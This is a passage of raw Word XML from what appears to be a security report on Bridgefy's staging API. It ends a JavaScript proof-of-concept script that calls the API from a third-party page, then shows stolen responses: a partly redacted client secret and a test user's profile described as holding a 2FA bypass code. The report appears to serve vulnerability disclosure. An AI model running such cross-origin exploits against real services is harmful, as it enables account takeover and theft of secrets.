          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>endpoint[poc][1]); send(method + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>' ' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>+ poc, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'https://staging.sdk.bridgefy.services' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>endpoint[poc][1], i, method, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>endpoint[poc][2]);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>body</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:sectPr>
          <w:type w:val="continuous"/>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="0" w:bottom="0" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="219"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>third</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>party</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>website</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>can</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>retrieve</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>all</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>information</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>impersonate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>user:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="75"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>PoC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>1:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> Cards</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="36"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"response"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:[]}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="113"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>PoC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>2:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>GET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Client</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Secret</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"response"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>clientSecret"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"pi_3MN[...]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="113"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>PoC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>3:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>GET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>User</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Profile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(including</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>2FA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>bypass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>emergency</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>code)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="37"/>
        <w:ind w:left="720" w:right="585" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"response"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"id"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"639893112017b2dfe4319370"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"firstName"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"Julian</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-25"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Test"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"lastName"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>la</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="720" w:right="388" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Orta"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"country"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"id"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"60d25aaed1fe3a324c1fbf28"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"name"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"Mexico"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>},</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"industry"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"Tech"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"ro le"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"Engineering/Product"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"client"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"639893112017b2dfe431936e"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"companyName"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"Bridgefy"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"companyWebsite"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
